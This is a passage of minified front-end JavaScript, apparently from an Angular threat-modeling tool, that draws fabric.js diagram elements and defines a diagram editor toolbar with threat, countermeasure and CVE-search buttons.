Ei.fabric.Line([20,0,20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel1Line}),pe=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:c-16,myType:wt.AppLabel2}),Re=new Ei.fabric.Line([0,c-20,r,c-20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel2Line}),Fe=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:r,top:c/2,myType:wt.AppLabel3}),Ne=new Ei.fabric.Line([r-20,0,r-20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel3Line}),et=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:5,myType:wt.AppLabel4}),ut=new Ei.fabric.Line([0,20,r,20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel4Line}),Ze=null;i instanceof cf?Ze=i:i instanceof Ts&&i.Ref instanceof cf&&(Ze=i.Ref),n&&Ze.MobileAppInterfaceNameChanged.subscribe(It=>this.changeMobileAppInterfaceVisibility(Ze)),q.push(Y,te,pe,Re,Fe,Ne,et,ut),q.push(...this.createFlowAnchors(r,c,!0,!0,!0,!0));let yt=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.MobileApp,subTargetCheck:!0});return yt.on("scaling",It=>this.onScaleMobileApp(It)),this.changeMobileAppInterfaceVisibility(Ze,yt,!n),yt.setControlsVisibility({mtr:!1}),yt}onScaleMobileApp(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(Fe=>Fe[ot.myType]==wt.ElementBorder),n=e._objects.find(Fe=>Fe[ot.myType]==wt.ElementType),r=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel1),c=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel1Line),d=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel2),T=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel2Line),k=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel3),q=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel3Line),Y=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel4),te=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel4Line),pe=e.width*e.scaleX,Re=e.height*e.scaleY;i.set({height:Re,width:pe,scaleX:1,scaleY:1,left:-pe/2,top:-Re/2}),null==n||n.set({left:0,top:-Re/2+25}),null==r||r.set({left:-pe/2+20,top:0}),null==c||c.set({left:-pe/2+20,top:-Re/2,height:Re}),null==d||d.set({left:0,top:Re/2-16}),null==T||T.set({left:-pe/2,top:Re/2-20,width:pe}),null==k||k.set({left:pe/2,top:0}),null==q||q.set({left:pe/2-20,top:-Re/2,height:Re}),null==Y||Y.set({left:0,top:-Re/2+5}),null==te||te.set({left:-pe/2,top:-Re/2+20,width:pe}),this.onCanvasModified()}changeMobileAppInterfaceVisibility(a,e,i=!1){if(null==e&&(e=this.getCanvasElementByID(a.ID)),e){let n=e._objects.find(te=>te[ot.myType]==wt.AppLabel1),r=e._objects.find(te=>te[ot.myType]==wt.AppLabel1Line),c=e._objects.find(te=>te[ot.myType]==wt.AppLabel2),d=e._objects.find(te=>te[ot.myType]==wt.AppLabel2Line),T=e._objects.find(te=>te[ot.myType]==wt.AppLabel3),k=e._objects.find(te=>te[ot.myType]==wt.AppLabel3Line),q=e._objects.find(te=>te[ot.myType]==wt.AppLabel4),Y=e._objects.find(te=>te[ot.myType]==wt.AppLabel4Line);n.set("text",this.translate.instant(a.InterfaceLeft)),n.set(ot.visible,a.InterfaceLeft!=So.None&&!i),r.set(ot.visible,a.InterfaceLeft!=So.None&&!i),c.set("text",this.translate.instant(a.InterfaceBottom)),c.set(ot.visible,a.InterfaceBottom!=So.None&&!i),d.set(ot.visible,a.InterfaceBottom!=So.None&&!i),T.set("text",this.translate.instant(a.InterfaceRight)),T.set(ot.visible,a.InterfaceRight!=So.None&&!i),k.set(ot.visible,a.InterfaceRight!=So.None&&!i),null==q||q.set("text",this.translate.instant(a.InterfaceTop)),null==q||q.set(ot.visible,a.InterfaceTop!=So.None&&!i),null==Y||Y.set(ot.visible,a.InterfaceTop!=So.None&&!i),this.Canvas.requestRenderAll()}}createInteractor(a,e,i){let T=new Ei.fabric.Circle({left:35,top:22.5,radius:6,stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",originX:"center",originY:"center",canvasID:Fo(),myType:wt.InteractorHead,selectable:!0,hasBorders:!1,hasControls:!1}),k=new Ei.fabric.Line([25,32.5,45,32.5],{stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorArms}),q=new Ei.fabric.Line([33.5,28.5,33.5,42.5],{stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorBody}),Y=new Ei.fabric.Line([34,37.5,25,52.5],{stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorLeg1}),te=new Ei.fabric.Line([33,37.5,42,52.5],{stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorLeg2}),pe=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:35,top:65,textAlign:"center",myType:wt.ElementName}),Re=[T,k,q,Y,te,...this.createFlowAnchors(70,65,!0,!0),pe],Fe=new Ei.fabric.Group(Re,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.Interactor,subTargetCheck:!0});return Fe.on("scaling",Ne=>this.onScaleInteractor(Ne)),Fe.setControlsVisibility({mtr:!1}),Fe}onScaleInteractor(a){}createInterface(a,e,i,n){const d=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,left:12.5,top:12.5,width:25,height:25,fill:this.isDarkMode?D2.BackgroundColorDark:D2.BackgroundColorLight,myType:wt.ElementBorder});let T=null;"Interface1"==n&&(T=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:25,top:-5,textAlign:"center",myType:wt.ElementName}));const k=[d,T,...this.createFlowAnchors(50,50,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.DeviceInterface,subTargetCheck:!0});return setTimeout(()=>{let Y=q._objects.find(Fe=>Fe[ot.myType]==wt.ElementBorder),Re=this.createTextPositionPoint("t0",q.left+q.width/2,q.top+q.height/2+Y.top-25,q);Re[ot.opacity]=0,q[ot.t0ID]=Re[ot.canvasID],this.Canvas.add(Re)},100),q.on("scaling",Y=>this.onScaleInterface(Y)),q.setControlsVisibility({mtr:!1}),q}createTextPositionPoint(a,e,i,n){var r=new Ei.fabric.Circle({left:e,top:i,radius:5,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:a,canvasID:Fo(),myType:wt.TextPosPoint,selectable:!0,hasBorders:!1,hasControls:!1});return r[ot.textObjID]=n[ot.canvasID],r.setControlsVisibility({mtr:!1,mts:!1}),r}onScaleInterface(a){}createUseCase(a,e,i){let c=new Ei.fabric.Ellipse({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:50,rx:70,ry:25,fill:this.isDarkMode?D2.BackgroundColorDark:D2.BackgroundColorLight,myType:wt.ElementBorder}),d=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:17,textAlign:"center",myType:wt.ElementName}),T=[c];T.push(d,...this.createFlowAnchors(140,50,!0,!0));let k=new Ei.fabric.Group(T,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.SystemUseCase,subTargetCheck:!0});return k.on("scaling",q=>this.onScaleUseCase(q)),k.setControlsVisibility({mtr:!1}),k}onScaleUseCase(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2,rx:n/2,ry:r/2}),this.onCanvasModified()}createExternalEntity(a,e,i){const k=[new Ei.fabric.Rect({stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:75,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabExternal Entity\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),myType:wt.SystemExternalEntity});return q.on("scaling",Y=>this.onScaleExternalEntity(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleExternalEntity(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createTrustArea(a,e,i,n=300,r=300){let c=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,width:n,height:r,strokeDashArray:[10,5],fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:5,myType:wt.ElementName}),T=new Ei.fabric.Group([c,d],{left:a,top:e,hasControls:!0,hasBorders:!1,lockRotation:!0,ID:i.ID,canvasID:Fo(),elementTypeID:Et.LogTrustArea,myType:wt.TrustArea});return T.on("scaling",k=>this.onScaleTrustArea(k)),T.setControlsVisibility({mtr:!1}),T}onScaleTrustArea(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e._objects.find(d=>d[ot.myType]==wt.ElementName),r=e.width*e.scaleX,c=e.height*e.scaleY;i.set({height:c,width:r,scaleX:1,scaleY:1,left:-r/2,top:-c/2}),n.set({left:-r/2+5,top:-c/2+5}),this.onCanvasModified()}}let Clt=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.dialog=n,this.locStorage=r,this.translate=c,this.faArrowsAltH=V$,this.faLongArrowAltRight=XX,this.menuTopLeftPosition={x:"0",y:"0"},this.selectionChanged=new Tt,this.navTreeChanged=new Tt}get Zoom(){if(this.Dia.Canvas){let e=this.Dia.Canvas.getZoom();return[.33,.5,.66,.75,1,1.5,2,2.5,3].includes(e)||(this.zoomSelect.nativeElement.selectedIndex=9),e}return null}set Zoom(e){this.Dia.SetZoom(e),this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ZOOM,e.toString())}get IsContextDiagram(){return this.diagram instanceof b2}get HasMnemonics(){return this.dataService.Config.GetStencilThreatMnemonics().length>0}get HasThreatRuleGroups(){var e;return(null===(e=this.GetThreatRuleGroups())||void 0===e?void 0:e.length)>0}get selectedElement(){var e;return null===(e=this.Dia)||void 0===e?void 0:e.SelectedElement}set selectedElement(e){this.Dia&&(this.Dia.SelectedElement=e)}ngOnInit(){var e;this.diagram&&this.diagram instanceof ns?(this.diagram instanceof Vg?this.Dia=new $T(this.diagram,this.dataService,this.theme,this.dialog,this.locStorage,this.translate):this.diagram instanceof b2&&(this.Dia=new R7(this.diagram,this.dataService,this.theme,this.dialog,this.locStorage,this.translate,null===(e=this.selectedNode)||void 0===e?void 0:e.dataType)),this.Dia.SelectionChanged.subscribe(i=>{this.selectionChanged.emit(i)}),this.Dia.NavTreeChanged.subscribe(()=>this.navTreeChanged.emit())):console.error("Undefined diagram")}onKeyDown(e){e.ctrlKey?"c"==e.key&&this.selectedElement&&"BODY"==document.activeElement.tagName?(e.preventDefault(),this.Dia.CopyElement()):"v"==e.key&&this.Dia.CanCopy&&"BODY"==document.activeElement.tagName&&(e.preventDefault(),this.Dia.PasteElement()):"Delete"==e.key&&this.selectedElement&&"BODY"==document.activeElement.tagName&&(e.preventDefault(),this.Dia.OnDeleteElement(this.selectedElement))}ngOnDestroy(){this.Dia.Save()}GetIconColor(e){return e?this.theme.IsDarkMode?"#FFF":"#000":this.theme.IsDarkMode?"#676767":"#B6B6B6"}GetContextIconColor(e){return e?this.theme.IsDarkMode?"#FFF":"#707070":this.theme.IsDarkMode?"#676767":"#B6B6B6"}ShowSuggestedThreats(){this.dialog.OpenSuggestThreatsDialog(this.selectedElement)}ShowCVESearch(){this.dialog.OpenCveSearchDialog(this.selectedElement,this.diagram.ID)}GetThreatRuleGroups(){let e=this.dataService.Config.GetThreatRuleGroups().filter(i=>{var n;return(null===(n=i.ThreatRules)||void 0===n?void 0:n.length)>0});return this.diagram.Settings.GenerationThreatLibrary&&(e=e.filter(i=>i.ThreatRules.every(n=>!n.IsActive))),e}OnResized(e,i){this.Dia.OnResized(e,i)}SetZoom(e){this.Zoom=Number(e.target.value)}OpenContextMenu(e){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:this.selectedElement},this.matMenuTrigger.openMenu()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-diagram"]],viewQuery:function(e,i){if(1&e&&(Mi($ct,5),Mi(Kct,5)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.zoomSelect=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{selectedNode:"selectedNode",diagram:"diagram",selectedElement:"selectedElement"},outputs:{selectionChanged:"selectionChanged",navTreeChanged:"navTreeChanged"},decls:360,vars:176,consts:[[2,"width","100%","height","100%"],[1,"tools","mat-elevation-z8"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"margin-left","0px",3,"matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matMenuTriggerFor","matTooltip"],["gridMenu","matMenu"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["color","primary",3,"disabled","ngModel","ngModelChange","click"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["cx","3","cy","3","r","2",4,"ngIf"],["cx","3","cy","20","r","2",4,"ngIf"],["cx","20","cy","3","r","2",4,"ngIf"],["cx","20","cy","20","r","2",4,"ngIf"],["cx","11.5","cy","3","r","2"],["cx","11.5","cy","20","r","2"],["cx","3","cy","11.5","r","2"],["cx","20","cy","11.5","r","2"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"toolBtn-Selected","matTooltip","click",4,"ngIf"],["mat-button","","class","toolBtn","style","margin-left: 0px;","matTooltipShowDelay","1000",3,"toolBtn-Selected","matTooltip","click",4,"ngIf"],["textSizeMenu","matMenu"],["mat-menu-item","",2,"height","fit-content",3,"click"],["color","primary","value","1",3,"checked"],["color","primary","value","2",3,"checked"],["color","primary","value","3",3,"checked"],["color","primary","value","4",3,"checked"],["color","primary","value","5",3,"checked"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["x","7.5","y","9","width","10","height","7","rx","3","ry","3","stroke-width","1"],["x","2.5","y","2.5","width","11","height","8","rx","3","ry","3","stroke-width","1.5"],["x","4.5","y","4.5","width","7","height","4","rx","2","ry","2","stroke-width","1.5"],["x","11.5","y","14.5","width","11","height","8","rx","3","ry","3","stroke-width","1.5"],["x","13.5","y","16.5","width","7","height","4","rx","2","ry","2","stroke-width","1.5"],["x","5","y","5","width","10","height","10","rx","3","ry","3","stroke-width","1"],["x","10","y","10","width","11","height","11","rx","3","ry","3","stroke-width","1.5"],["x","12","y","12","width","7","height","7","rx","2","ry","2","stroke-width","1.5"],["x","7.5","y","8.5","width","10","height","9","rx","3","ry","3","stroke-width","1"],["matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",2,"z-index","1",3,"matBadge","matBadgeHidden"],["x","1","y","1","width","23","height","23","rx","3","ry","3"],["x","2","y","16",1,"heavy"],["mat-button","","class","toolBtn","color","accent","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"z-index","1",3,"matMenuTriggerFor","matTooltip"],["matBadge","G","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below"],["generationMenu","matMenu"],["mat-menu-item","",3,"matMenuTriggerFor",4,"ngIf"],["mat-menu-item","",3,"disabled","matMenuTriggerFor"],["mnemonics","matMenu"],["mat-menu-item","",4,"ngFor","ngForOf"],["ruleGroups","matMenu"],[2,"margin-right","5px","float","right","margin-top","3px",3,"value","change"],["zoomSelect",""],["value","0.33"],["value","0.5"],["value","0.66"],["value","0.75"],["value","1"],["value","1.5"],["value","2"],["value","2.5"],["value","3"],[3,"value",4,"ngIf"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"margin-right","5px","float","right",3,"matTooltip","click"],[1,"my-canvas",2,"width","100%","float","left","overflow","auto",3,"resized","mousedown","mouseup","contextmenu"],["cc",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],["cx","3","cy","3","r","2"],["cx","3","cy","20","r","2"],["cx","20","cy","3","r","2"],["cx","20","cy","20","r","2"],[3,"icon"],["mat-button","","color","accent","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["mat-menu-item","",3,"matMenuTriggerFor"],[3,"value"],[4,"ngIf"],["mat-menu-item","",3,"matMenuTriggerFor","click"],["saveImg","matMenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"click",4,"ngIf"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e){const n=Ye();m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.Dia.SetMouse()}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"mouse"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",3),he("click",function(){return i.Dia.SetPan()}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon"),s(15,"pan_tool"),u(),s(16,"\n    "),u(),s(17,"\n    "),m(18,"button",4),he("click",function(){return i.Dia.SetMove()}),oe(19,"translate"),s(20,"\n      "),m(21,"mat-icon"),s(22,"highlight_alt"),u(),s(23,"\n    "),u(),s(24,"\n    "),m(25,"button",5),oe(26,"translate"),s(27,"\n      "),m(28,"mat-icon"),s(29,"grid_4x4"),u(),s(30,"\n    "),u(),s(31,"\n    "),m(32,"mat-menu",null,6),s(34,"\n      "),m(35,"button",7),s(36,"\n        "),m(37,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.Dia.ShowGrid=c})("click",function(c){return c.stopPropagation()}),s(38),oe(39,"translate"),u(),s(40,"\n      "),u(),s(41,"\n      "),m(42,"button",7),s(43,"\n        "),m(44,"mat-slide-toggle",9),he("ngModelChange",function(c){return i.Dia.StickToGrid=c})("click",function(c){return c.stopPropagation()}),s(45),oe(46,"translate"),u(),s(47,"\n      "),u(),s(48,"\n    "),u(),s(49,"\n\n    "),m(50,"button",4),he("click",function(){return i.Dia.AnchorCount=8==i.Dia.AnchorCount?4:8}),oe(51,"translate"),s(52,"\n      "),fi(),m(53,"svg",10),s(54,"\n        "),ne(55,Xct,1,1,"circle",11),s(56,"\n        "),ne(57,Yct,1,1,"circle",12),s(58,"\n        "),ne(59,Jct,1,1,"circle",13),s(60,"\n        "),ne(61,Zct,1,1,"circle",14),s(62,"\n      \n        "),it(63,"circle",15),s(64,"\n        "),it(65,"circle",16),s(66,"\n        "),it(67,"circle",17),s(68,"\n        "),it(69,"circle",18),s(70,"\n      "),u(),s(71,"\n    "),u(),s(72,"\n\n    "),ne(73,tlt,5,7,"button",19),s(74,"\n    "),ne(75,ilt,5,6,"button",20),s(76,"\n    "),ne(77,alt,6,5,"button",19),s(78,"\n    "),ne(79,nlt,6,5,"button",19),s(80,"\n    "),ln(),m(81,"button",5),oe(82,"translate"),s(83,"\n      "),m(84,"mat-icon"),s(85,"format_size"),u(),s(86,"\n    "),u(),s(87,"\n    "),m(88,"mat-menu",null,21),s(90,"\n      "),m(91,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=1}),s(92,"\n        "),m(93,"mat-radio-group"),s(94,"\n          "),m(95,"mat-radio-button",23),s(96),oe(97,"translate"),u(),s(98,"\n        "),u(),s(99,"\n      "),u(),s(100,"\n      "),m(101,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=2}),s(102,"\n        "),m(103,"mat-radio-group"),s(104,"\n          "),m(105,"mat-radio-button",24),s(106),oe(107,"translate"),u(),s(108,"\n        "),u(),s(109,"\n      "),u(),s(110,"\n      "),m(111,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=3}),s(112,"\n        "),m(113,"mat-radio-group"),s(114,"\n          "),m(115,"mat-radio-button",25),s(116),oe(117,"translate"),u(),s(118,"\n        "),u(),s(119,"\n      "),u(),s(120,"\n      "),m(121,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=4}),s(122,"\n        "),m(123,"mat-radio-group"),s(124,"\n          "),m(125,"mat-radio-button",26),s(126),oe(127,"translate"),u(),s(128,"\n        "),u(),s(129,"\n      "),u(),s(130,"\n      "),m(131,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=5}),s(132,"\n        "),m(133,"mat-radio-group"),s(134,"\n          "),m(135,"mat-radio-button",27),s(136),oe(137,"translate"),u(),s(138,"\n        "),u(),s(139,"\n      "),u(),s(140,"\n    "),u(),s(141,"\n    "),ne(142,olt,6,4,"button",28),s(143,"\n    "),ne(144,rlt,6,4,"button",28),s(145,"\n    "),m(146,"button",4),he("click",function(){return i.Dia.SendToBack()}),oe(147,"translate"),s(148,"\n      "),fi(),m(149,"svg",10),s(150,"\n        "),it(151,"rect",29),s(152,"\n        "),it(153,"rect",30),s(154,"\n        "),it(155,"rect",31),s(156,"\n        "),it(157,"rect",32),s(158,"\n        "),it(159,"rect",33),s(160,"\n      "),u(),s(161,"\n    "),u(),s(162,"\n    "),ln(),m(163,"button",4),he("click",function(){return i.Dia.SendBackwards()}),oe(164,"translate"),s(165,"\n      "),fi(),m(166,"svg",10),s(167,"\n        "),it(168,"rect",34),s(169,"\n        "),it(170,"rect",35),s(171,"\n        "),it(172,"rect",36),s(173,"\n      "),u(),s(174,"\n    "),u(),s(175,"\n    "),ln(),m(176,"button",4),he("click",function(){return i.Dia.BringForward()}),oe(177,"translate"),s(178,"\n      "),fi(),m(179,"svg",10),s(180,"\n        "),it(181,"rect",35),s(182,"\n        "),it(183,"rect",36),s(184,"\n        "),it(185,"rect",34),s(186,"\n      "),u(),s(187,"\n    "),u(),s(188,"\n    "),ln(),m(189,"button",4),he("click",function(){return i.Dia.BringToFront()}),oe(190,"translate"),s(191,"\n      "),fi(),m(192,"svg",10),s(193,"\n        "),it(194,"rect",30),s(195,"\n        "),it(196,"rect",31),s(197,"\n        "),it(198,"rect",32),s(199,"\n        "),it(200,"rect",33),s(201,"\n        "),it(202,"rect",37),s(203,"\n      "),u(),s(204,"\n    "),u(),s(205,"\n    "),ln(),m(206,"button",4),he("click",function(){return i.Dia.AddAnnotation()}),oe(207,"translate"),s(208,"\n      "),m(209,"mat-icon"),s(210,"edit"),u(),s(211,"\n    "),u(),s(212,"\n    "),s(213,"\n    "),m(214,"button",4),he("click",function(){return i.Dia.SelectNextUninitObject()}),oe(215,"translate"),s(216,"\n      "),m(217,"mat-icon",38),s(218,"update"),u(),s(219,"\n    "),u(),s(220,"\n    "),m(221,"button",4),he("click",function(){return i.ShowSuggestedThreats()}),oe(222,"translate"),s(223,"\n      "),m(224,"mat-icon"),s(225,"flash_auto"),u(),s(226,"\n    "),u(),s(227,"\n    "),m(228,"button",4),he("click",function(){return i.Dia.AddThreat()}),oe(229,"translate"),s(230,"\n      "),m(231,"mat-icon"),s(232,"flash_on"),u(),s(233,"\n    "),u(),s(234,"\n    "),m(235,"button",4),he("click",function(){return i.ShowCVESearch()}),oe(236,"translate"),s(237,"\n      "),s(238,"\n      "),fi(),m(239,"svg",10),s(240,"\n        "),it(241,"rect",39),s(242,"\n        "),m(243,"text",40),s(244,"CVE"),u(),s(245,"\n      "),u(),s(246,"\n    "),u(),s(247,"\n    "),ne(248,slt,6,4,"button",28),s(249,"\n    "),ln(),m(250,"button",4),he("click",function(){return i.Dia.AddCountermeasure()}),oe(251,"translate"),s(252,"\n      "),m(253,"mat-icon"),s(254,"security"),u(),s(255,"\n    "),u(),s(256,"\n    "),ne(257,clt,6,4,"button",41),s(258,"\n    "),m(259,"button",42),oe(260,"translate"),s(261,"\n      "),m(262,"mat-icon",43),s(263,"settings"),u(),s(264,"\n    "),u(),s(265,"\n    "),m(266,"mat-menu",null,44),s(268,"\n      "),m(269,"button",7),s(270,"\n        "),m(271,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.diagram.Settings.GenerationThreatLibrary=c})("click",function(c){return c.stopPropagation()}),s(272),oe(273,"translate"),u(),s(274,"\n      "),u(),s(275,"\n      "),ne(276,llt,2,1,"button",45),s(277,"\n      "),m(278,"button",46),s(279),oe(280,"translate"),u(),s(281,"\n      "),m(282,"button",7),s(283,"\n        "),m(284,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.diagram.Settings.GenerationAssetBased=c})("click",function(c){return c.stopPropagation()}),s(285),oe(286,"translate"),u(),s(287,"\n      "),u(),s(288,"\n      "),m(289,"mat-menu",null,47),s(291,"\n        "),ne(292,dlt,5,2,"button",48),s(293,"\n      "),u(),s(294,"\n      "),m(295,"mat-menu",null,49),s(297,"\n        "),ne(298,mlt,5,2,"button",48),s(299,"\n      "),u(),s(300,"\n    "),u(),s(301,"\n    "),s(302,"\n    "),m(303,"select",50,51),he("change",function(c){return i.SetZoom(c)}),s(305,"\n      "),m(306,"option",52),s(307,"33%"),u(),s(308,"\n      "),m(309,"option",53),s(310,"50%"),u(),s(311,"\n      "),m(312,"option",54),s(313,"66%"),u(),s(314,"\n      "),m(315,"option",55),s(316,"75%"),u(),s(317,"\n      "),m(318,"option",56),s(319,"100%"),u(),s(320,"\n      "),m(321,"option",57),s(322,"150%"),u(),s(323,"\n      "),m(324,"option",58),s(325,"200%"),u(),s(326,"\n      "),m(327,"option",59),s(328,"250%"),u(),s(329,"\n      "),m(330,"option",60),s(331,"300%"),u(),s(332,"\n      "),ne(333,ult,3,5,"option",61),s(334,"\n    "),u(),s(335,"\n    "),m(336,"button",62),he("click",function(){return i.Dia.FitToCanvas(i.Dia.CanvasScreenWidth,i.Dia.CanvasScreenHeight)}),oe(337,"translate"),s(338,"\n      "),m(339,"mat-icon"),s(340,"fit_screen"),u(),s(341,"\n    "),u(),s(342,"\n  "),u(),s(343,"\n  "),m(344,"div",63,64),he("resized",function(c){be(n);const d=Ti(345);return Me(i.Dia.OnResized(c,d))})("mousedown",function(c){return i.Dia.OnOuterCanvasMouseDown(c)})("mouseup",function(c){return i.Dia.OnOuterCanvasMouseUp(c)})("contextmenu",function(c){return i.OpenContextMenu(c)}),s(346,"\n    "),s(347,"\n    "),s(348,"\n  "),u(),s(349,"\n\n  "),it(350,"div",65,66),s(352," \n  "),m(353,"mat-menu",null,67),s(355," \n    "),ne(356,_lt,24,9,"ng-template",68),s(357," \n  "),u(),s(358," \n"),u(),s(359,"\n")}if(2&e){const 